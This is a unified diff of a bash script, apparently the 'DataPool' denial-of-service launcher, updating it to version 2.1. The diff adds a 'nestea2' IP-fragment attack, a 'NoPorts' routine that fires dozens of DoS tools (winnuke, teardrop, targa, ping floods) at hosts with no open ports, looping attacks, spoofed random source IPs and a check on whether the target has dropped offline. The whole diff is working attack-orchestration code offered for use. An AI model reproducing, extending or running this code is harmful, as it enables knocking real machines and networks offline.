@@ -1,4 +1,15 @@
 #!/bin/bash
+#April 10, 2000-
+#Updated the code..fixed a bug where the script hung...added one more
+#dos attack...thas bout all=P
+#
+#April 7, 2000-
+#Whelp....after some off time from the script...i did some testing...and found
+#out that it was kinda stupid to leave a computer alone if there were no ports
+#open but the host was up..so i found all the attacks that didn't need ports
+#and included them into their own list...now when u attack a system with no
+#ports......=]  have fun!=]  oh..and updated the ascii=P
+#
 #April 1, 2000-
 #Made just a few minor changes this morning...the script now has a progress
 #bar-like thing for the timed attacks..and i put in a compile script for the
@@ -170,22 +181,21 @@ fi
 if [ "$PORTLIST" = "" ]; then
 PORTLIST="1-65535"
 fi
-echo "__________  ___  ____________________________________________________"
-echo "|___|____| (   ) _|____|______|______|______|_____|______|_____|_____"
-echo "__|____|__ |   |  ___|____|______|______|_______|____|______|_______|"
-echo "____|____| |   | _|____|_____|______|______|_______|_____|______|____"
-echo "_|_____|__ |   | _________  __|__        ::[DataPool v2.0]::   ___|__"
-echo "___  ______)   |/         \ _____ Features:                    _|____"
-echo "_|_ /          |  P O_O L | __|__ *  81 DoS attacks            ___|__"
-echo "___ |    _     |    / \   | _____ *  Line speed option         _|____"
-echo "_|_ |   / \    |    \_/   | __|__ *  Looping attack option     ___|__"
-echo "___ |   \_/    |          | _____ *  Logging option            _|____"
-echo "_|_ | D A T A  |    ______/ __|__ *  Connection watching       ___|__"
-echo "___ \_________/|   ( ____________ *  Multiple IP attacks       _|____"
-echo "__|___________ |   | _|____|____|_________________________________|__"
-echo "_|____|____|__ |   | ____|____|_____|_____|______|______|_____|_____|"
-echo "____|____|____ |   | _|____|____|_____|______|______|_____|______|___"
-echo "_|____|____|__ (___) ____|____|_____|______|______|_____|_____|_____|"	
+echo "          d8b           d8b                                       d8b"
+echo "          888         \"88888\"                                     888"
+echo "     e88~-888  e88~-888 888  e88~-888 d88-~88e   e88~-e   e88~-e  888"
+echo "    d88D  888 d888  888 888 d888  888 888  P88b d888  8b d888  8b 888"
+echo "    888A  888 8888  888 888 8888  888 888  O888 8888  88 8888  88 888" 
+echo "    888T  888 Y888  888 888 Y888  888 888  O88P Y888  8P Y888  8P 888"
+echo "     \"8A_-888  \"88_-888 \"8\"  \"88_-888 888-_L8\"   \"88_-\"   \"88_-\"  \"8\""
+echo "                                      888                            "
+echo "    \"\"\"\"\"Y888888888888888888888888888 \"8\" 88888888beeeeeeeeeeee      "
+echo " Version 2.1      \"\"\"\"\"\"\"Y888888888888eee888888888888888888888888ee  "
+echo " * Multiple IP attacks      \"\"\"\"\"\"\"\"Y888888888888888888888888888P    "
+echo " * Connection Watching                     \"\"\"\"\"\"\"Y888888888P        "
+echo " * Looping attacks * \"Don't stop till they drop\"    \"\"\"\"\"\"           "
+echo " * 82 DoS attacks * Line speed option * Portless attacks             "
+echo " * Port range specification * Random source IP generation            "
 
 if [ "$SRCIP" = "" ] || [ "$SRCIP" = "" ]; then
 RANDOM1=$RANDOM
@@ -216,6 +226,12 @@ if [ "$ping" = "3 packets transmitted, 0 packets received, 100% packet loss" ];
 fi
 }
 
+function nestea2 {
+ echo "Running IP fragment attack (nestea2)..."
+ ./bin/nestea2 $SRCIP $DESTIP $DESTIP -s $OUTPUT -t $OUTPUT -n `expr 300 "*" $LINESPEED` -q 1>/dev/null 2>/dev/null
+LASTATTACK="nestea2"
+pingtest
+}
 function comatose {
  echo "Running ICMP flooder (comatose)..."
  ./bin/comatose $SRCIP $DESTIP `expr 10 "*" $LINESPEED` 1>/dev/null 2>/dev/null
@@ -718,7 +734,7 @@ LASTATTACK="spiffit"
 }
 function stuffit {
  echo "Running ping attack (stuffit)..."
- ping $DESTIP -f -s 1024 -p 7e 1>/dev/null 2>/dev/null
+ ping $DESTIP -f -s 1024 -p 7e 1>/dev/null 2>/dev/null &
 TEST=1
 while [ $TEST -le `expr 15 "*" $LINESPEED` ]
 do
@@ -861,6 +877,52 @@ function flushot {
 LASTATTACK="flushot"
  pingtest
 }
+function NoPorts {
+kox
+pimp
+pimp2
+moyari13
+fawx
+laser
+oshare
+gin
+dosfrontpage
+jaypee
+udpflood
+onetwothreefour
+opentear
+doslinux
+ascendfoo
+beer
+biffit
+bloop
+bonk
+coke
+conseal
+echok
+foqerc
+galt_gin
+gewse
+gewse5
+jolt
+overdrop
+pirchslap
+pong
+rc8
+spiffit
+stuffit
+ssping
+synful
+targa
+targa2
+targa3
+trash
+trash2
+twinge
+winfreez
+winnuke
+flushot
+}
 function FullAttack {
  koc
  kod
@@ -899,6 +961,7 @@ function FullAttack {
  misfrag
  mutilate
  nestea
+ nestea2
  newtear
  teardrop
  overdrop
@@ -967,6 +1030,7 @@ function LinuxAttack {
  doslinux
  overdrop
  nestea 
+ nestea2
  orgasm
  newtear
  teardrop
@@ -1081,6 +1145,7 @@ function WinAttack {
  conseal
  misfrag
  nestea
+ nestea2
  syndrop
  synful
  synhose
@@ -1206,11 +1271,50 @@ OUTPUT=`cat ./output.txt -n | grep 1 -w | cut -b8-`
 if [ "$OUTPUT" = "" ]; then
 if [ -n "$LOGFILE" ]; then
 echo "No Ports" >> ./$LOGFILE
-echo "-----------------------------"
-	fi
+fi
     
-echo "No ports found to attack.  Exiting..."
-    exit 3
+echo "No ports found."
+
+if [ -f ./svcname.txt ]; then
+rm -rf ./svcname.txt
+fi
+if [ -f ./output2.txt ]; then
+rm -rf ./output2.txt
+fi
+
+while true ; do
+
+    if [ "$DONTSTOP" = "1" ]; then
+    DONTSTOPPER
+    fi
+
+if [ "$COUNTER1" = "43" ]; then
+    echo "Attack Complete!"
+    echo "Checking to see if $DESTIP is still alive ..."
+        ping=`ping -c3 $DESTIP | grep 100%`
+	        
+if [ "$ping" = "3 packets transmitted, 0 packets received, 100% packet loss" ]; then
+        echo "Host was dropped by $LASTATTACK."
+	if [ -n "$LOGFILE" ]; then
+	echo "Dropped by $LASTATTACK." >> ./$LOGFILE
+	echo "-----------------------------"
+	fi
+	exit 0
+else
+        echo "He's still alive=\ You might wanna try again..."
+	if [ -n "$LOGFILE" ]; then
+	echo "-----------------------------"
+	fi
+	exit 5
+fi
+    else 
+    echo "Attacking $DESTIP"
+NoPorts
+fi    
+    	
+COUNTER1=`expr $COUNTER1 + 1`
+done     	 
+
 fi
     OSCHECK=`echo "$OS" | grep "Windows"`
     if [ "$OSCHECK" = "" ]; then
@@ -1234,15 +1338,29 @@ fi
 i=1
 while read LINE
 do
-LINE2=`cat ./svcname.txt -n | grep $i | cut -b8-`
-echo "$LINE-$LINE2" >> ./output2.txt
+cat ./svcname.txt -n | grep $i -w | cut -b8- > ./output3.txt
+TESTING=`cat ./output3.txt | wc -l | cut -b7-`
+if [ "$TESTING" != "1" ]; then
+x=1
+while read LINE3
+do
+if [ "$x" = "1" ]; then
+LINE2="$LINE3"
+fi
+x=`expr $x + 1`
+done < "./output3.txt"
+else
+LINE2=`cat ./output3.txt`
+fi
+rm ./output3.txt
+echo "$LINE/$LINE2" >> ./output2.txt
 i=`expr $i + 1`
 done < "./output.txt"
 cat ./output2.txt > ./output.txt
 rm -rf ./output2.txt
 rm -rf ./svcname.txt
 
-NUMPORTS=`cat ./output.txt | wc -l | cut -b7-`
+NUMPORTS=`cat ./output.txt | wc -l | cut -b-8`
 OUTPUTLIST=`cat ./output.txt`
 if [ -n "$LOGFILE" ]; then
 echo "Open ports:" >> ./$LOGFILE
@@ -1262,7 +1380,7 @@ case $OS in
     echo "OS could not be detected. Running all attacks..."
     ;;
 esac    
-
+NUMPORTS=`echo $NUMPORTS `
 echo "$NUMPORTS TCP port(s) were found open:"
 echo "$OUTPUTLIST"
 if [ "$SCANONLY" = "1" ]; then
@@ -1275,7 +1393,7 @@ fi
 
 while true ; do
 
-    OUTPUT=`cat ./output.txt -n | grep $COUNTER1 -w | cut -b8- | cut -d- -f1`
+    OUTPUT=`cat ./output.txt -n | grep $COUNTER1 -w | cut -b8- | cut -d/ -f1`
     if [ "$OUTPUT" = "" ]; then
     if [ "$DONTSTOP" = "1" ]; then
     DONTSTOPPER
@@ -1321,3 +1439,4 @@ fi
     	
 COUNTER1=`expr $COUNTER1 + 1`
 done     	 
+    
